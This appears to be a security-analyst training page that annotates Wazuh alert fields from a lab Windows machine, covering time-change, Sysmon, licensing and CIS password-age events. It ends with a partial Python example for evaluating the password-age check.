data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533929.509200 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4616 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12288 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:32:01.6175627Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43812 Incremental log record number – handy for timeline order.
data.win.system.processID: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS Text severity (INFO, WARNING, ERROR).
data.win.system.message: "The system time was changed.
Subject:
Security ID: S-1-5-19
Account Name: LOCAL SERVICE
Account Domain: NT AUTHORITY
Logon ID: 0x3E5
Process Information:
Process ID: 0x1c48
Name: C:\Windows\System32\svchost.exe
Previous Time: 2025-04-24T22:32:00.197033200Z
New Time: 2025-04-24T22:32:01.616986800Z
This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-19 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.previousTime: 2025-04-24T22:32:00.1970332Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.newTime: 2025-04-24T22:32:01.6169868Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 0x1c48 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533929.512405 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4616 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12288 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:32:01.6277365Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43813 Incremental log record number – handy for timeline order.
data.win.system.processID: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS Text severity (INFO, WARNING, ERROR).
data.win.system.message: "The system time was changed.
Subject:
Security ID: S-1-5-19
Account Name: LOCAL SERVICE
Account Domain: NT AUTHORITY
Logon ID: 0x3E5
Process Information:
Process ID: 0x1c48
Name: C:\Windows\System32\svchost.exe
Previous Time: 2025-04-24T22:32:01.625752900Z
New Time: 2025-04-24T22:32:01.626929900Z
This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-19 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.previousTime: 2025-04-24T22:32:01.6257529Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.newTime: 2025-04-24T22:32:01.6269299Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 0x1c48 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Suspicious Windows cmd shell execution Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92032 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087', 'T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery', 'Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery', 'Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533930.515610 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:02.0990286Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 212287 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION Text severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-17 16:37:01.957
ProcessGuid: {94294ddc-2e2d-6801-e307-000000000e00}
ProcessId: 7128
Image: C:\Windows\System32\ipconfig.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: IP Configuration Utility
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: ipconfig.exe
CommandLine: C:\WINDOWS\system32\ipconfig /renew
CurrentDirectory: C:\Windows\System32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B
ParentProcessGuid: {94294ddc-2e25-6801-d807-000000000e00}
ParentProcessId: 4044
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:37:01.957 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-2e2d-6801-e307-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 7128 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\ipconfig.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: IP Configuration Utility No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: ipconfig.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\ipconfig /renew No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Windows\\System32\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-2e25-6801-d807-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533941.521070 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:58.3562531Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 213065 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION Text severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:37:58.354
ProcessGuid: {94294ddc-2e5b-6801-fa07-000000000e00}
ProcessId: 12712
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vmq431i2.0u4.ps1
CreationUtcTime: 2025-04-17 16:37:58.354
User: Attacker\Attcker1" Rendered Sysmon message; the same values are split into the data.win.eventdata.* fields below. The headline here is that powershell.exe (PID 12712) created __PSScriptPolicyTest_<random>.ps1 in the user's Temp folder. PowerShell writes that file at start-up to test whether an AppLocker or WDAC script enforcement policy applies, so the file itself is expected; the question worth answering is what launched this powershell.exe, which the ProcessGuid pivot to Sysmon event ID 1 gives you.
data.win.eventdata.utcTime: 2025-04-17 16:37:58.354 Sysmon's own timestamp for the file operation (UTC, millisecond); systemTime is the slightly later write to the log.
data.win.eventdata.processGuid: {94294ddc-2e5b-6801-fa07-000000000e00} Sysmon's unique ID for the creating process. It survives PID reuse, so it is the key for pivoting to that process's event ID 1 (parent, command line, how it was launched) and event ID 3 (network connections).
data.win.eventdata.processId: 12712 PID of the creating process at the time. PIDs are reused; correlate on processGuid instead.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable that created the file. The doubled backslashes are JSON escaping, not part of the path.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vmq431i2.0u4.ps1 Full path of the created file; this is what the rule matched on. __PSScriptPolicyTest_<random>.ps1 in a user's Temp is the file PowerShell writes at start-up to test whether an AppLocker or WDAC script policy is enforced, so the file is expected; what matters is why powershell.exe started, which the processGuid pivot answers.
data.win.eventdata.creationUtcTime: 2025-04-17 16:37:58.354 Creation timestamp now on the file. Equal to utcTime here, so a new file. If it were earlier, an existing file was overwritten or its creation time was backdated (Sysmon event ID 2 covers the latter).
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process ran as, DOMAIN\user. The domain part equals the hostname, so this is a local account.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: License activation (slui.exe) failed. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60646 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533946.523838 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP ETW provider; Security-SPP is the Software Protection Platform (Windows licensing and activation). Despite the name it has nothing to do with the Security event log.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} Fixed GUID of that provider; exact-match filter key.
data.win.system.eventSourceName: Software Protection Platform Service Legacy event source name, present because this provider also registers the classic way; harmless duplication of providerName.
data.win.system.eventID: 8198 Event ID within this provider, not a Security-log ID: 8198 is a failed license activation attempt. The 4624/4688 cheat sheet does not apply here.
data.win.system.version: 0 Schema version of this event type; only matters when a parser breaks after an upgrade.
data.win.system.level: 2 Numeric severity: 2 = Error, matching severityValue ERROR below. It is the licensing service's idea of severity, not a security rating.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:32:19.2047110Z When the record was written, UTC. Here it matches the alert id's epoch (1745533946 = 24 April 2025, 22:32 UTC) to within seconds, i.e. a live event, unlike the week-old Sysmon events on this page.
data.win.system.eventRecordID: 2396 Incremental log record number – handy for timeline order.
data.win.system.processID: 1832 PID of the process that wrote the record (the Software Protection service), not of slui.exe.
data.win.system.threadID: 0 Thread of the writing process; 0 means it was not recorded, usual for classic (non-manifest) events.
data.win.system.channel: Application Event log channel holding the record: the Application log, where software rather than the OS security subsystem reports problems.
data.win.system.computer: Attacker Hostname stamped by the event log itself; should equal agent.name.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "License Activation (slui.exe) failed with the following error code:
hr=0x80004005
Command-line arguments:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent" Rendered message. hr=0x80004005 is E_FAIL, the generic unspecified-error HRESULT, so the code itself says little; the arguments say more: Action=AutoActivate with Trigger=TimerEvent and NotificationInterval=1440 (minutes, i.e. once a day) is the licensing service's automatic daily retry, and rule.firedtimes: 4 fits a machine that is simply not activated. On a lab VM that is noise. It matters only on a machine that should be activated, where the usual causes are a broken KMS/AD-based activation path or blocked egress to Microsoft's activation endpoints. slui.exe is the Windows activation UI, not something an attacker needs to touch.
data.win.eventdata.data: hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent The same message body as Wazuh's parsed event data. Classic providers do not name their event-data strings, so the agent concatenates them into one field instead of splitting them into named fields like the Sysmon eventdata above.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from passed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from passed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from passed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19012 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['1.1.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.2'] Maps to safeguard 5.2 of the CIS Critical Security Controls (the CIS Controls), the control framework this benchmark recommendation implements; distinct from the benchmark section number in rule.cis.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533950.526135 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Kind of SCA message: check is the result of one individual check; summary carries the per-scan totals. It does not describe a scan engine.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26001 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting defines how long a user can use their password before it expires. Values for this policy setting range from 0 to 999 days. If you set the value to 0, the password will never expire. Because attackers can crack passwords, the more frequently you change the password the less opportunity an attacker has to use a cracked password. However, the lower this value is set, the higher the potential for an increase in calls to help desk support due to users having to change their password or forgetting which password is current. The recommended state for this setting is 365 or fewer days, but not 0. Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The longer a password exists the higher the likelihood that it will be compromised by a brute force attack, by an attacker gaining general knowledge about the user, or by the user sharing the password. Configuring the Maximum password age setting to 0 so that users are never required to change their passwords is a major security risk because that allows a compromised password to be used by the malicious user for as long as the valid user has authorized access. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to 365 or fewer days, but not 0: Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Maximum password age Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 1.1.2 Benchmark section this check implements; same value as rule.cis, carried on the check record itself.
data.sca.check.compliance.cis_csc: 5.2 CIS Controls safeguard mapping; same value as rule.cis_csc.
data.sca.check.command: ['net.exe accounts'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable Outcome of this run: passed, failed, or, as here, not applicable. Not applicable means the check could not be evaluated at all; it is neither a pass nor a fail, and the reason field says why. Do not open a hardening ticket on it.
data.sca.check.reason: Timeout overtaken running command 'net.exe accounts' Why the result is not applicable: the agent's timeout for running net.exe accounts expired before the command returned. That makes this a scanner problem, not a configuration change. Re-run net accounts on the host by hand; if it hangs there too, look at what the endpoint was doing in this window, bearing in mind the agent-buffer full/flooded alerts logged seconds later on the same agent.
data.sca.check.previous_result: passed Last run's result. passed to not applicable is not drift in the setting; the check simply did not run. Real drift is passed to failed or the reverse.
location: sca Which log source produced the event (e.g., sysmon, auditd).
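The three-state result this alert turns on (passed, failed, not applicable) is easy to misread as drift. The following is an added example, not Wazuh's SCA engine or any code from this page: it parses constructed `net.exe accounts` output, applies the CIS 1.1.2 rule (365 or fewer days, but not 0), and reports a timeout the way the agent did, as not applicable with a reason rather than as a failure. The sample output, the 30-second timeout and the function names are assumptions for illustration.

```python
"""Evaluate CIS 1.1.2 (Maximum password age) the way Wazuh SCA reports it.

Added example, not Wazuh's SCA engine. It reproduces the three result states
(passed, failed, not applicable) on constructed `net.exe accounts` output and
shows why passed -> not applicable is a scanner failure, not drift.
"""
import re
import subprocess
from typing import Optional


def sample_net_accounts(max_age: str) -> str:
    """Constructed output of `net.exe accounts` on an English-locale host."""
    return (
        "Force user logoff how long after time expires?:       Never\n"
        "Minimum password age (days):                          1\n"
        f"Maximum password age (days):                          {max_age}\n"
        "Minimum password length:                              0\n"
        "Length of password history maintained:                None\n"
        "Lockout threshold:                                    Never\n"
        "Lockout duration (minutes):                           30\n"
        "Lockout observation window (minutes):                 30\n"
        "Computer role:                                        WORKSTATION\n"
        "The command completed successfully.\n"
    )


MAX_AGE_RE = re.compile(r"^Maximum password age \(days\):\s+(\S+)\s*$", re.M)


def parse_max_password_age(output: str) -> Optional[int]:
    """Days before a password expires; 0 when net.exe prints 'Unlimited'
    (policy value 0, never expires); None if the line is absent."""
    m = MAX_AGE_RE.search(output)
    if m is None:
        return None
    value = m.group(1)
    return 0 if value.lower() == "unlimited" else int(value)


def evaluate_check(output: Optional[str]) -> dict:
    """Map command output to an SCA-style result dict.

    output is None when the command did not finish in time, the case on this
    page: SCA then reports 'not applicable' with a reason, never 'failed'.
    """
    if output is None:
        return {"result": "not applicable",
                "reason": "Timeout overtaken running command 'net.exe accounts'"}
    days = parse_max_password_age(output)
    if days is None:
        return {"result": "not applicable",
                "reason": "'Maximum password age' not found in command output"}
    passed = 0 < days <= 365            # 365 or fewer days, but not 0
    return {"result": "passed" if passed else "failed", "max_password_age_days": days}


def run_net_accounts(timeout_s: float = 30.0) -> Optional[str]:
    """Run the real command with a timeout (Windows only, assumed 30 s here);
    returns None on timeout so evaluate_check() reports 'not applicable'
    exactly like the agent did."""
    try:
        done = subprocess.run(["net.exe", "accounts"], capture_output=True,
                              text=True, timeout=timeout_s, check=False)
    except subprocess.TimeoutExpired:
        return None
    return done.stdout


def is_drift(previous_result: str, current: dict) -> bool:
    """True only for a real passed <-> failed change. A move into or out of
    'not applicable' says the check did not run, not that the setting moved."""
    cur = current["result"]
    if "not applicable" in (previous_result, cur):
        return False
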